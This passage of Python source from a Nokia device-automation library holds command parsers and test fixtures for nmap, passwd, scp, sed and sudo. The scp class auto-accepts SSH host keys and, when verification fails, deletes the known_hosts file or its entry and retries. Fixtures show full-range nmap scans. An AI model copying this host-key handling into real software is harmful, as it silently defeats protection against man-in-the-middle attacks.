u'LINE': u'Nmap scan report for 10.9.134.5',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.6',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.6',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.7',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.7',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.8',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.8',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.9',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.9',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.10',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.10',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.11',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.11',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.12',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.12',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.13',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.13',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.14',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.14',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.15',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.15',
u'RECEIVED': None}],
}
COMMAND_OUTPUT_CIPHERS = """root@cp19-nj:# nmap --script ssl-enum-ciphers -p 443 10.83.180.140 -PN
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 10:43 CET
Nmap scan report for 10.83.182.143
Host is up (0.000067s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-enum-ciphers:
| TLSv1.2:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 4096) - A
| compressors:
| NULL
| cipher preference: client
|_ least strength: A
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
root@cp19-nj:#"""
COMMAND_KWARGS_CIPHERS = {'options': '--script ssl-enum-ciphers -p 443',
'ip': '10.83.180.140'}
COMMAND_RESULT_CIPHERS = {u'CIPHERS': [u'TLS_DHE_RSA_WITH_AES_128_GCM_SHA256'],
u'PORTS': {u'443/tcp': {u'PORT': u'443',
u'REASON': None,
u'SERVICE': u'https',
u'STATE': u'open',
u'TYPE': u'tcp'},
u'LINES': [u'443/tcp open https']},
u'SCAN_REPORTS': [{u'ADDRESS': u'10.83.182.143',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.83.182.143',
u'RECEIVED': None}]}
```
#### File: cmd/unix/passwd.py
```python
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class Passwd(GenericUnixCommand):
def __init__(self, connection, current_password=None, new_password=<PASSWORD>, user=None, options=None,
encrypt_password=True, newline_chars=None, runner=None):
"""
Moler class of Unix command passwd.
:param connection: moler connection to device, terminal when command is executed
:param current_password: user <PASSWORD>
:param new_password: <PASSWORD>
:param user: user to change password
:param options: additional command parameters
:param encrypt_password: If True then * will be in logs when password is sent, otherwise plain text
:param newline_chars: Characters to split lines
:param runner: Runner to run command
"""
super(Passwd, self).__init__(connection=connection, newline_chars=newline_chars, runner=runner)
self.user = user
self.current_password = <PASSWORD>
self.new_password = <PASSWORD>
self.options = options
self.encrypt_password = encrypt_password
self._current_password_sent = False
self._new_password_sent = False
self._retype_new_password_sent = False
self._cancel_cmd = False
self.current_ret["PASSWORD_CHANGED"] = False
self.current_ret["LINES"] = []
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
cmd = "passwd"
if self.options:
cmd = "{} {}".format(cmd, self.options)
if self.user:
cmd = "{} {}".format(cmd, self.user)
return cmd
def on_new_line(self, line, is_full_line):
"""
Parses the output of the command.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
try:
if self._cancel_cmd:
self._send_enters_to_cancel_cmd()
if is_full_line:
self._parse_line(line)
self._parse_re_too_short_password(line)
self._parse_too_simple_password(line)
self._parse_error(line)
self._parse_password_updated_successfully(line)
self._parse_current_password(line)
self._parse_new_password(line)
self._parse_retype_new_password(line)
except ParsingDone:
pass
return super(Passwd, self).on_new_line(line, is_full_line)
# Current password:
_re_current_password = re.compile(r'Current .*password:')
def _parse_current_password(self, line):
"""
Detect current password prompt.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_current_password, line) and not self._current_password_sent:
self.connection.sendline(data=self.current_password, encrypt=self.encrypt_password)
self._current_password_sent = True
raise ParsingDone
# New password:
_re_new_password = re.compile(r'New .*password:')
def _parse_new_password(self, line):
"""
Detect new password prompt.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_new_password, line) and not self._new_password_sent:
self.connection.sendline(data=self.new_password, encrypt=self.encrypt_password)
self._new_password_sent = True
raise ParsingDone
# Retype new password:
_re_retype_new_password = re.compile(r'Retype .*new password:')
def _parse_retype_new_password(self, line):
"""
Detect retype new password prompt.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_retype_new_password,
line) and not self._retype_new_password_sent:
self.connection.sendline(data=self.new_password, encrypt=self.encrypt_password)
self._retype_new_password_sent = True
raise ParsingDone
# Bad: new password is too simple
_re_too_simple_password = re.compile(r'Bad: new password is too simple')
def _parse_too_simple_password(self, line):
"""
Parse too simple password error.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_too_simple_password, line):
self.set_exception(CommandFailure(self, "New password is too simple."))
self._cancel_cmd = True
# You must choose a longer password
_re_too_short_password = re.compile(r'You must choose a longer password')
def _parse_re_too_short_password(self, line):
"""
Parse too short password error.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_too_short_password, line):
self.set_exception(CommandFailure(self, "New password is too short."))
self._cancel_cmd = True
raise ParsingDone
# passwd: Authentication token manipulation error
_re_passwd_error = re.compile(r"passwd: (?P<ERROR>.* error)")
def _parse_error(self, line):
"""
Parse another error.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_passwd_error, line):
self.set_exception(CommandFailure(self, "Unexpected error: '{}'".format(self._regex_helper.group('ERROR'))))
self._cancel_cmd = True
raise ParsingDone
# passwd: password updated successfully
_re_password_updated_successfully = re.compile(r'passwd: password updated successfully')
def _parse_password_updated_successfully(self, line):
"""
Parse password updated successfully.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_password_updated_successfully, line):
self.current_ret["PASSWORD_CHANGED"] = True
raise ParsingDone
def _parse_line(self, line):
"""
Parse single full line and add it to result dict.
:param line: Line from device.
:return: None
"""
self.current_ret["LINES"].append(line)
def _send_enters_to_cancel_cmd(self, ):
"""
Send enter to cancel cmd.
:return: None but raises ParsingDone if all required commands are sent.
"""
self.connection.sendline("")
raise ParsingDone
COMMAND_OUTPUT_no_user = """user@host:~$: passwd
Changing password for user.
Current password:
New password:
Retype new password:
passwd: <PASSWORD>
user@host:~$"""
COMMAND_KWARGS_no_user = {
"current_password": "<PASSWORD>",
"new_password": "<PASSWORD>"
}
COMMAND_RESULT_no_user = {
"PASSWORD_CHANGED": True,
"LINES": [
"Changing password for user.",
"Current password:",
"New password:",
"Retype new password:",
"passwd: <PASSWORD>",
]
}
COMMAND_OUTPUT_with_user = """user@host:~$: passwd user
Changing password for user.
Current password:
New password:
Retype new password:
passwd: <PASSWORD>
user@host:~$"""
COMMAND_KWARGS_with_user = {
"user": "user",
"current_password": "old_password",
"new_password": "<PASSWORD>"
}
COMMAND_RESULT_with_user = {
"PASSWORD_CHANGED": True,
"LINES": [
"Changing password for user.",
"Current password:",
"New password:",
"Retype new password:",
"passwd: <PASSWORD>",
]
}
COMMAND_OUTPUT_with_options = """user@host:~$: passwd -S user
user P 05/22/2018 0 99999 7 -1
user@host:~$"""
COMMAND_KWARGS_with_options = {
"user": "user",
"options": "-S"
}
COMMAND_RESULT_with_options = {
"PASSWORD_CHANGED": False,
"LINES": [
"user P 05/22/2018 0 99999 7 -1"
]
}
```
#### File: cmd/unix/scp.py
```python
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
import six
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>'
class Scp(GenericUnixCommand):
def __init__(self, connection, source, dest, password="", options="", prompt=None, newline_chars=None,
known_hosts_on_failure='keygen', encrypt_password=True, runner=None, repeat_password=True):
"""
Represents Unix command scp.
:param connection: moler connection to device, terminal when command is executed
:param source: path to source
:param dest: path to destination
:param password: scp password or list of passwords for multi passwords connection
:param prompt: prompt (on system where command runs).
:param newline_chars: characters to split lines
:param known_hosts_on_failure: "rm" or "keygen" how to deal with error. If empty then scp fails.
:param encrypt_password: If True then * will be in logs when password is sent, otherwise plain text
:param runner: Runner to run command
:param repeat_password: If True then repeat last password if no more provided. If False then exception is set.
"""
super(Scp, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.source = source
self.dest = dest
self.options = options
self.known_hosts_on_failure = known_hosts_on_failure
self.encrypt_password = encrypt_password
self.ret_required = True
# Internal variables
self._sent_password = False
self._sent_continue_connecting = False
self._hosts_file = ""
if isinstance(password, six.string_types):
self._passwords = [password]
else:
self._passwords = list(password) # copy of list of passwords to modify
self.repeat_password = <PASSWORD>
self._last_password = ""
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
cmd = "scp"
if self.options:
cmd = "{} {} {} {}".format(cmd, self.options, self.source, self.dest)
else:
cmd = "{} {} {}".format(cmd, self.source, self.dest)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise.
:return: None.
"""
try:
self._know_hosts_verification(line)
self._parse_success(line)
self._push_yes_if_needed(line)
self._parse_sent_password(line)
self._parse_failed(line)
self._get_hosts_file_if_displayed(line)
except ParsingDone:
pass
if is_full_line:
self._sent_password = False # Clear flag for multi passwords connections
return super(Scp, self).on_new_line(line, is_full_line)
_re_parse_success = re.compile(r'^(?P<FILENAME>\S+)\s+.*\d+%.*')
def _parse_success(self, line):
"""
Parses line if success.
:param line: Line from device.
:return: None.
:raises ParsingDone: if matches success.
"""
if self._regex_helper.search_compiled(Scp._re_parse_success, line):
if 'FILE_NAMES' not in self.current_ret.keys():
self.current_ret['FILE_NAMES'] = list()
self.current_ret['FILE_NAMES'].append(self._regex_helper.group('FILENAME'))
raise ParsingDone()
_re_parse_failed = re.compile(
r'cannot access|Could not|no such|denied|not a regular file|Is a directory|No route to host|"'
r'lost connection|Not a directory', re.IGNORECASE)
def _parse_failed(self, line):
"""
Parses line if failed.
:param line: Line from device.
:return: None.
:raises ParsingDone: if matches fail.
"""
if self._regex_helper.search_compiled(Scp._re_parse_failed, line):
self.set_exception(CommandFailure(self, "Command failed in line >>{}<<.".format(line)))
raise ParsingDone()
_re_parse_permission_denied = re.compile(
r'Permission denied, please try again|Permission denied \(publickey,password\)')
def _parse_sent_password(self, line):
"""
Sends password if necessary.
:param line: Line from device.
:return: None.
:raises ParsingDone: if password was sent.
"""
if (not self._sent_password) and self._is_password_requested(line):
try:
pwd = self._passwords.pop(0)
self._last_password = <PASSWORD>
self.connection.sendline(pwd, encrypt=self.encrypt_password)
except IndexError:
if self.repeat_password:
self.connection.sendline(self._last_password, encrypt=self.encrypt_password)
else:
self.set_exception(CommandFailure(self, "Password was requested but no more passwords provided."))
self.break_cmd()
self._sent_password = True
raise ParsingDone()
_re_password = re.compile(r'password:', re.IGNORECASE)
def _is_password_requested(self, line):
"""
Parses line if password is requested.
:param line: Line from device.
:return: Match object if matches, otherwise None.
"""
return self._regex_helper.search_compiled(Scp._re_password, line)
def _push_yes_if_needed(self, line):
"""
Sends yes to device if needed.
:param line: Line from device.
:return: None.
:raises ParsingDone: if line handled by this method.
"""
if (not self._sent_continue_connecting) and self._parse_continue_connecting(line):
self.connection.sendline('yes')
self._sent_continue_connecting = True
raise ParsingDone()
_re_continue_connecting = re.compile(r"\(y/n\)|\(yes/no.*\)\?|'yes' or 'no':", re.IGNORECASE)
def _parse_continue_connecting(self, line):
"""
Parses continue connecting.
:param line: Line from device.
:return: Match object if matches, None otherwise.
"""
return self._regex_helper.search_compiled(Scp._re_continue_connecting, line)
_re_host_key = re.compile(r"Add correct host key in (?P<PATH>\S+) to get rid of this message", re.IGNORECASE)
def _get_hosts_file_if_displayed(self, line):
"""
Parses hosts file.
:param line: Line from device.
:return: None.
:raises ParsingDone: if line handled by this method.
"""
if (self.known_hosts_on_failure is not None) and self._regex_helper.search_compiled(Scp._re_host_key, line):
self._hosts_file = self._regex_helper.group("PATH")
raise ParsingDone()
_re_id_dsa = re.compile("id_dsa:", re.IGNORECASE)
_re_host_key_verification_failure = re.compile(r'Host key verification failed.')
def _know_hosts_verification(self, line):
"""
Parses host key verification.
:param line: Line from device.
:return: None.
:raises ParsingDone: if line handled by this method.
"""
if self._regex_helper.search_compiled(Scp._re_id_dsa, line):
self.connection.sendline("")
raise ParsingDone()
elif self._regex_helper.search_compiled(Scp._re_host_key_verification_failure, line):
if self._hosts_file:
self._handle_failed_host_key_verification()
else:
self.set_exception(CommandFailure(self, "Command failed in line >>{}<<.".format(line)))
raise ParsingDone()
def _handle_failed_host_key_verification(self):
"""
Handles failed host key verification.
:return: None.
"""
if "rm" == self.known_hosts_on_failure:
self.connection.sendline("\nrm -f " + self._hosts_file)
elif "keygen" == self.known_hosts_on_failure:
self.connection.sendline("\nssh-keygen -R " + self.dest)
else:
self.set_exception(
CommandFailure(self,
"Bad value of parameter known_hosts_on_failure '{}'. "
"Supported values: rm or keygen.".format(
self.known_hosts_on_failure)))
self._sent_continue_connecting = False
self._sent_password = False
self.connection.sendline(self.command_string)
COMMAND_OUTPUT_succsess = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
COMMAND_KWARGS_succsess = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>"
}
COMMAND_RESULT_succsess = {
'FILE_NAMES': [
u'test.txt'
]
}
COMMAND_KWARGS_rm = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>",
"known_hosts_on_failure": "rm"
}
COMMAND_OUTPUT_recursively_succsess = """
ute@debdev:~/Desktop$ scp -r test ute@localhost:/home/ute
ute@localhost's password:
test.txt 100% 104 0.1KB/s 00:00
test2.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
COMMAND_KWARGS_recursively_succsess = {
"source": "test",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>",
"options": "-r"
}
COMMAND_RESULT_recursively_succsess = {
'FILE_NAMES': [
u'test.txt',
u'test2.txt'
]
}
COMMAND_KWARGS_rm = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>",
"known_hosts_on_failure": "rm"
}
COMMAND_OUTPUT_rm = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
Are you sure you want to continue connecting (yes/no)?"
Please contact your system administrator.
Add correct host key in /home/sward/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/sward/.ssh/known_hosts:86
RSA host key for [...] has changed and you have requested strict checking.
Host key verification failed.
ute@debdev:~/Desktop$ rm -f /home/sward/.ssh/known_hosts
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$ """
COMMAND_RESULT_rm = {
'FILE_NAMES': [
u'test.txt'
]
}
COMMAND_KWARGS_keygen = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>",
}
COMMAND_OUTPUT_keygen = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
id_dsa:
Are you sure you want to continue connecting (yes/no)?"
Please contact your system administrator.
Add correct host key in /home/sward/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/sward/.ssh/known_hosts:86
RSA host key for [...] has changed and you have requested strict checking.
Host key verification failed.
ute@debdev:~/Desktop$ ssh-keygen -R ute@localhost:/home/ute
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$ """
COMMAND_RESULT_keygen = {
'FILE_NAMES': [
u'test.txt'
]
}
COMMAND_OUTPUT_ldap = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
ldap password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
COMMAND_KWARGS_ldap = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": ("<PASSWORD>", "<PASSWORD>")
}
COMMAND_RESULT_ldap = {
'FILE_NAMES': [
u'test.txt'
]
}
```
#### File: cmd/unix/sed.py
```python
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
class Sed(GenericUnixCommand):
def __init__(self, connection, input_files, prompt=None, newline_chars=None, runner=None, options=None,
scripts=None, script_files=None, output_file=None):
super(Sed, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
# Parameters defined by calling the command
self.options = options # string or None
self.scripts = scripts # list of strings or None
self.script_files = script_files # list of strings or None
self.input_files = input_files # list of strings
self.output_file = output_file # string or None
# Other parameters
self.current_ret['RESULT'] = list()
def build_command_string(self):
cmd = "sed"
if self.options:
cmd = "{} {}".format(cmd, self.options)
if self.scripts:
for script in self.scripts:
cmd = "{} -e '{}'".format(cmd, script)
if self.script_files:
for script_file in self.script_files:
cmd = "{} -f {}".format(cmd, script_file)
if self.input_files:
for in_file in self.input_files:
cmd = "{} {}".format(cmd, in_file)
if self.output_file:
cmd = "{} > {}".format(cmd, self.output_file)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._command_error(line)
self._parse_line(line)
except ParsingDone:
pass
return super(Sed, self).on_new_line(line, is_full_line)
_re_command_error = re.compile(r"sed:\s(?P<ERROR>.*)", re.IGNORECASE)
def _command_error(self, line):
if self._regex_helper.search_compiled(Sed._re_command_error, line):
self.set_exception(CommandFailure(self, "ERROR {}".format(self._regex_helper.group("ERROR"))))
raise ParsingDone
def _parse_line(self, line):
self.current_ret['RESULT'].append(line)
raise ParsingDone
def _is_input_file(self):
is_empty = True
for file in self.input_files:
if file and not file.isspace():
is_empty = False
if is_empty:
raise CommandFailure(self, "No input file given in: {}".format(self.input_files))
def _validate_start(self, *args, **kwargs):
super(Sed, self)._validate_start(*args, **kwargs)
# _validate_start is called before running command on connection, so we raise exception instead of setting it
self._is_input_file()
COMMAND_OUTPUT = """xyz@debian:~$ sed -e 's/a/A/' old old2 > new
xyz@debian:~$"""
COMMAND_KWARGS = {
'scripts': ['s/a/A/'], 'output_file': 'new', 'input_files': ['old', 'old2']
}
COMMAND_RESULT = {
'RESULT': []
}
COMMAND_OUTPUT_to_stdout = """xyz@debian:~$ sed -e 's/a/A/' old old2
Apple
peAr
plum
xyz@debian:~$"""
COMMAND_KWARGS_to_stdout = {
'scripts': ['s/a/A/'],
'input_files': ['old', 'old2']
}
COMMAND_RESULT_to_stdout = {
'RESULT': ['Apple', 'peAr', 'plum']
}
COMMAND_OUTPUT_with_script_file = """xyz@debian:~$ sed -f script old old2 > new
xyz@debian:~$"""
COMMAND_KWARGS_with_script_file = {
'script_files': ['script'],
'output_file': 'new',
'input_files': ['old', 'old2']
}
COMMAND_RESULT_with_script_file = {
'RESULT': []
}
COMMAND_OUTPUT_with_option = """xyz@debian:~$ sed -i -e 's/a/A/' old old2
xyz@debian:~$"""
COMMAND_KWARGS_with_option = {
'options': '-i',
'scripts': ['s/a/A/'],
'input_files': ['old', 'old2']
}
COMMAND_RESULT_with_option = {
'RESULT': []
}
```
#### File: cmd/unix/sudo.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018-2021, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.commandchangingprompt import CommandChangingPrompt
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
from moler.helpers import copy_dict
from moler.helpers import create_object_from_name
class Sudo(CommandChangingPrompt):
"""Unix command sudo"""
def __init__(self, connection, password=None, sudo_params=None, cmd_object=None, cmd_class_name=None,
cmd_params=None, prompt=None, newline_chars=None, runner=None, encrypt_password=True,
expected_prompt=None, set_timeout=None, set_prompt=None, target_newline="\n",
allowed_newline_after_prompt=False, prompt_after_login=None):
"""
Constructs object for Unix command sudo.
:param connection: Moler connection to device, terminal when command is executed.
:param password: password for sudo.
:param sudo_params: params for sudo (not for command for sudo)
:param cmd_object: object of command. Pass this object or cmd_class_name.
:param cmd_class_name: full (with package) class name. Pass this name or cmd_object.
:param cmd_params: params for cmd_class_name. If cmd_object is passed this parameter is ignored.
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
:param encrypt_password: If True then * will be in logs when password is sent, otherwise plain text.
:param set_timeout: Command to set timeout after telnet connects.
:param set_prompt: Command to set prompt after telnet connects.
:param target_newline: newline chars on remote system where ssh connects.
:param allowed_newline_after_prompt: If True then newline chars may occur after expected (target) prompt.
:param prompt_after_login: prompt after login before send export PS1. If you do not change prompt exporting PS1
then leave it None.
"""
if expected_prompt is None or expected_prompt == '':
expected_prompt = prompt
super(Sudo, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner, expected_prompt=expected_prompt, set_timeout=set_timeout,
set_prompt=set_prompt, target_newline=target_newline,
allowed_newline_after_prompt=allowed_newline_after_prompt,
prompt_after_login=prompt_after_login)
if password is None:
password = ""
self.password = password
self.cmd_object = cmd_object
self.cmd_params = cmd_params
self.cmd_class_name = cmd_class_name
self.encrypt_password = <PASSWORD>
self.sudo_params = sudo_params
self.timeout_from_embedded_command = True # Set True to set timeout from command or False to use timeout set in
# sudo command.
self._sent_password = False
self._sent_command_string = False
self.newline_seq = "\n"
self._line_for_sudo = False
self._command_output_started = False
self.ret_required = False
self._validated_embedded_parameters = False # Validate parameters only once
self._finish_on_final_prompt = False
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
self._build_command_object()
cmd = "sudo"
if self.sudo_params:
cmd = "{} {}".format(cmd, self.sudo_params)
if self.cmd_object:
cmd = "{} {}".format(cmd, self.cmd_object.command_string)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise.
:return: None.
"""
try:
self._parse_password(line)
self._process_wrong_password(line)
self._parse_command_not_found(line)
self._parse_error(line)
except ParsingDone:
self._line_for_sudo = True
super(Sudo, self).on_new_line(line, is_full_line)
def start(self, timeout=None, *args, **kwargs):
"""Start background execution of connection-observer."""
if timeout is not None:
self.timeout_from_embedded_command = False
return super(Sudo, self).start(timeout=timeout, args=args, kwargs=kwargs)
def _process_line_from_command(self, current_chunk, line, is_full_line):
"""
Processes line from command.
:param current_chunk: Chunk of line sent by connection.
:param line: Line of output (current_chunk plus previous chunks of this line - if any) without newline char(s).
:param is_full_line: True if line had newline char(s). False otherwise.
:return: None.
"""
decoded_line = self._decode_line(line=line)
self._line_for_sudo = False
self.on_new_line(line=decoded_line, is_full_line=is_full_line)
if self.cmd_object:
if not self._line_for_sudo:
if not self.done() or self._command_output_started:
self._command_output_started = True
embedded_command_done = self.cmd_object.done()
self._process_embedded_command(partial_data=current_chunk)
if not embedded_command_done and self.cmd_object.done():
# process again because prompt was sent
self.on_new_line(line=decoded_line, is_full_line=is_full_line)
def _process_embedded_command(self, partial_data):
"""
Processes embedded command, passes output from device to embedded command.
:param partial_data: Line from device filtered by sudo, only for embedded command.
:return: None.
"""
if self.cmd_object:
if not self._sent_command_string:
self._sent_command_string = True
self.cmd_object.life_status._is_running = True
cs = "{}{}".format(self.cmd_object.command_string, self.newline_seq)
self.cmd_object.data_received(cs, self._last_recv_time_data_read_from_connection)
prev_cmd_timeout = self.cmd_object.timeout
self.cmd_object.data_received(partial_data, self._last_recv_time_data_read_from_connection)
new_cmd_timeout = self.cmd_object.timeout
if self.timeout_from_embedded_command and prev_cmd_timeout != new_cmd_timeout:
timedelta = new_cmd_timeout - prev_cmd_timeout
self.extend_timeout(timedelta=timedelta)
self.current_ret = self.cmd_object.current_ret
if self.cmd_object.done():
try:
result = self.cmd_object.result()
if self._finish_on_final_prompt is False and self.done() is False:
self.set_result(result=result)
except Exception as ex:
self.set_exception(ex)
self._finish_on_final_prompt = True
# sudo: pwd: command not found
_re_sudo_command_not_found = re.compile(r"sudo:.*command not found", re.I)
def _parse_command_not_found(self, line):
"""
Parses if command not found is found in line.
:param line: Line from device.
:return: None.
:raises: ParsingDone if regex matches the line.
"""
if re.search(Sudo._re_sudo_command_not_found, line):
self.set_exception(CommandFailure(self, "Command not found in line '{}'.".format(line)))
self._finish_on_final_prompt = True
raise ParsingDone()
# Sorry, try again.
_re_sudo_sorry_try_again = re.compile(r"Sorry, try again.", re.I)
def _get_wrong_password_regex(self):
return Sudo._re_sudo_sorry_try_again
def _process_wrong_password(self, line):
"""
Parses line for wrong password from sudo.
:param line: Line from device.
:return: None
:raises: ParsingDone if regex matches the line.
"""
if re.search(self._get_wrong_password_regex(), line):
if self._sent_password and not self._command_output_started:
self.set_exception(CommandFailure(self, "Command error password found in line '{}'.".format(line)))
self._finish_on_final_prompt = True
self._sent_password = False
raise ParsingDone()
# sudo: /usr/bin/sudo must be owned by uid 0 and have the setuid bit set
_re_sudo_error = re.compile(r"sudo:.*must be owned by uid\s+\d+\s+and have the setuid bit set|usage: sudo|"
r"sudo: \d+ incorrect password attempt|sudo: not found", re.I)
def _get_error_regex(self):
return Sudo._re_sudo_error
def _parse_error(self, line):
"""
Parses if command not found is found in line.
:param line: Line from device.
:return: None.
:raises: ParsingDone if regex matches the line.
"""
if re.search(self._get_error_regex(), line):
self.set_exception(CommandFailure(self, "Command su error found in line '{}'.".format(line)))
self._finish_on_final_prompt = True
raise ParsingDone()
# [sudo] password for user:
_re_sudo_password = re.compile(r"\[sudo\] password for.*:", re.I)
def _get_password_regex(self):
return Sudo._re_sudo_password
def _parse_password(self, line):
"""
Parses if sudo waits for password.
:param line: Line from device.
:return: None.
:raises: ParsingDone if regex matches the line.
"""
if re.search(self._get_password_regex(), line):
if not self._sent_password:
self.connection.sendline(self.password, encrypt=self.encrypt_password)
self._sent_password = True
raise ParsingDone()
def _validate_start(self, *args, **kwargs):
"""
Validates internal data before start.
:param args: args passed to super _validate_start
:param kwargs: kwargs passed to super _validate_start
:return: None.
:raises: CommandFailure if error in command settings.
"""
super(Sudo, self)._validate_start(*args, **kwargs)
self._validate_passed_object_or_command_parameters()
if self.cmd_object:
self.ret_required = self.cmd_object.ret_required
if self.timeout_from_embedded_command:
self.timeout = self.cmd_object.timeout
else:
self.ret_required = False
def _validate_passed_object_or_command_parameters(self):
"""
Validates passed parameters to create embedded command object.
:return: None
:raise: CommandFailure if command parameters are wrong.
"""
if self._validated_embedded_parameters:
return # Validate parameters only once
if not self.cmd_class_name and not self.cmd_object and not self.sudo_params:
# _validate_start is called before running command on connection, so we raise exception
# instead of setting it
raise CommandFailure(
self,
"Neither 'cmd_class_name' nor 'cmd_object' nor 'sudo_params' was provided to Sudo constructor."
"Please specific parameter.")
if self.cmd_object and self.cmd_class_name:
# _validate_start is called before running command on connection, so we raise exception instead
# of setting it
raise CommandFailure(
self,
"Both 'cmd_object' and 'cmd_class_name' parameters provided. Please specify only one."
)
if self.cmd_object and self.cmd_object.done():
# _validate_start is called before running command on connection, so we raise exception
# instead of setting it
raise CommandFailure(
self,
"Not allowed to run again the embedded command (embedded command is done): {}.".format(
self.cmd_object))
self._validated_embedded_parameters = True
def _build_command_object(self):
"""
Builds command object from passed parameters to sudo command.
:return: None
"""
self._validate_passed_object_or_command_parameters()
if self.cmd_object:
return
elif self.cmd_class_name is not None:
params = copy_dict(self.cmd_params)
params["connection"] = self.connection
params['prompt'] = self._re_prompt
params["newline_chars"] = self._newline_chars
self.cmd_object = create_object_from_name(self.cmd_class_name, params)
if self.cmd_object is None:
self._finish_on_final_prompt = True
COMMAND_OUTPUT_whoami = """
user@client:~/moler$ sudo whoami
[sudo] password for user:
root
user@client:~/moler$ """
COMMAND_RESULT_whoami = {
"USER": "root"
}
COMMAND_KWARGS_whoami = {
"cmd_class_name": "moler.cmd.unix.whoami.Whoami",
"password": "<PASSWORD>",
}
COMMAND_OUTPUT_dynamic_timeout = """
user@client:~/moler$ sudo nmap -sS -sV -p- -P0 -vvv --reason --webxml --min-rate 100 --max-rate 300 -oA ipv4 1.1.1.4 -PN
